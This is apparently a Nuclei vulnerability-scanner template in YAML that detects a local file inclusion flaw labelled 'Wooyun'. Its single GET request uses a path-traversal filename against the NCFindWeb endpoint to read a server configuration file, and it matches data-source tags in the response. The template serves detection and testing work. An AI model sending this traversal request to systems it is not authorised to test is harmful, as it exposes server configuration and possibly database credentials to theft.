35 lines
796 B
YAML
35 lines
796 B
YAML
id: wooyun-path-traversal
|
|
|
|
info:
|
|
name: Wooyun - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: |
|
|
Wooyun is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
tags: lfi,wooyun
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- <DataSourceClassName>
|
|
- </DataSourceClassName>
|
|
part: body
|
|
condition: and
|